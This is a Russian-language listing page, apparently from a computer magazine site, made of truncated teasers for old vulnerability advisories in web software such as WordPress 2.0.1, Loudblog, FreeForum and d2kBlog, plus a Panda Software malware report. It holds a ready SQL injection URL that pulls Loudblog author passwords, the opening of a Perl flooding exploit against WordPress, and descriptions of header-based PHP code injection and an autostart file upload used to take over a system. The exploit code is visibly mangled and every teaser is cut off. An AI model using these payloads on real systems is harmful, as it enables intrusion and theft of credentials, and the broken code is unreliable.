Компьютер для продвинутых пользователей Содержание: Guppy ПО: Guppy Версия: 4.5.11 Сайт: http://www.freeguppy.org/ О продукте: Guppy - Это система создания веб-порталов, главным качество которой является простота работы и навигации. Не использует никаких баз данных. Это позволяет вам быстро создавать веб-порталы, без каких-либо технических знаний. Уязвимость: Обнаружена в файле 'dwnld.php. Уязвимость позволяет удаленному атакующему уничтожить базу данных файлов. Если magic_quotes_gpc = Off , то возможно ун...

Компьютер для продвинутых пользователей Содержание: FreeForum ПО: FreeForum Версия: 1.2 Сайт: http://soft.zoneo.net/freeForum/ Уязвимость: 1. Выполнение удаленного PHP кода. Уязвимый скрипт: func.inc.php Variables _SERVER[HTTP_X_FORWARDED_FOR] _SERVER[HTTP_CLIENT_IP] не проверяется до начала записи в файл 'Data/flood.db.php. Это можно использовать для вставки некоторого PHP кода через HTTP запрос с помощью X-Forwarded-For или Client-ip полей. Возможен доступ к системе. 2. Cross-Site scripting. Уязвимый скр...

Компьютер для продвинутых пользователей Содержание: Easy File Sharing Web Server ПО: Easy File Sharing Web Server Версия: 3.2 Веб-сайт: http://www.sharing-file.com/ О софте: Easy File Sharing Web Server программа Windows, которая позволяет обезопасить вашу веб-систему. Уязвимости: 1) Закачка файлов на удаленную систему: Зарегестрированный пользователь может закачать подготовленный файл в папку Автозапуска. После перезагрузки система может перейти в наше пользование. http://192.168.1.1/disk_c/Documents%20an...

Компьютер для продвинутых пользователей Содержание: PeerCast Недельный отчет Panda Software Russia о вирусах и вторжениях Отчет Panda Software Russia о вирусах и вторжениях прошедшей недели четко демонстрирует новые тенденции вредоносных программ. Два образца вредоносных кода, описываемых в данном отчете нацелены исключительно на мошенничество и кражу данных, а два прочих обладают функциями руткитов. Как пример внедряемой и практикуемой хакерами новой бизнес-модели, мы сегодня рассмотрим Nabload.CC. Этот т...

Компьютер для продвинутых пользователей Содержание: WordPress ПО: WordPress Версия: 2.0.1 О софте: WordPress является современной платформой для работы с ыеб-страницами. Exploit: !perl #Greets to all omega-team members + h4cky0u[h4cky0u.org, lessMX6 and all dudes from #DevilDev ;) #The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed use Socket; if @ARGV $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host ~ s/(http\/\/)//eg; #no http:// for $i=0; $i { $user\x61\x62\x63\x...

Компьютер для продвинутых пользователей Содержание: d2kBlog ПО: d2kBlog Версия: 1.0.3 О софте: Бесплатный продукт с открытым исходным кодом для ведения блогов с использованием ASP технологий. Уязвимости: Входной параметр "memName" посылается в 'profile.asp' через куки не проверяется до того, пока не начнется использование в SQL запросе. Это может быть использовано для работы с SQL инъекциями. Уязвимость может использоваться для вывода имени пользователя и паролей администратора. Входной параметр "msg" рабо...

Компьютер для продвинутых пользователей Содержание: Loudblog ПО: Loudblog Версия: 0.41 О софте: Loudblog быстрая и легкая в использовании система управления содержанием сайта (CMS) для работы со страничками в веб. Использование: SQL Injection в podcast.php (magic_quotes=off: http://[target]/loudblog/podcast.php?id=1' and '1'0' union select password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from lb_authors where '1'1' /* Чтение локальных файлов ...

Компьютер для продвинутых пользователей Содержание: phpBannerExchange ПО: phpBannerExchange Версия: 2.0 О софте: phpBannerExchange - написанный на PHP/MySQL скрипт, позволяет фактически с элементарными знаниями PHP, MySQL и веб-систем организовать банерообменую сеть. Этот скрипт написан с помощью сценариев. Уязвимость: Уязвимость найдена в phpBannerExchange 2.0 и ранних версиях, которая позволяет атакующему получить доступ к файлам лежащим на сервере. Ошибка заключается в неполной проверке данных, поступаю...

Компьютер для продвинутых пользователей Содержание: Link Bank ПО: Link Bank Версия: n\a Уязвимость: Link Bank не санирует отправленные сообщения, что позволяет пользователю вставить информацию, которую можно использовать в атакующих действиях. После отправки информация переходит в текстовой файл с расширением .txt, которые приложение читает и выполняет в виде ссылки. Этот недочет позволяет проводить xss атаки. В ./content/index.txt include"links.txt); > В ./content/add_link.txt: $url_name = _REQUEST'url_na...

Компьютер для продвинутых пользователей Содержание: HitHost ПО: HitHost Версия: 1.0.0 Уязвимость: HitHost использует _GET переменную в критической части и из-за прохождении код xss уязвимостей и возможна использование пользователям rm dirs chmoded на 0777. В ./admin/deleteuser.php: else { unlink"users/$deleteuser/password.php); unlink"users/$deleteuser/counter.php); rmdir"users/$deleteuser/); echo "The user $deleteuser has been deleted"; } Как вы видите 4 линия поднимает suspision до rming 0777 в ./admin/v...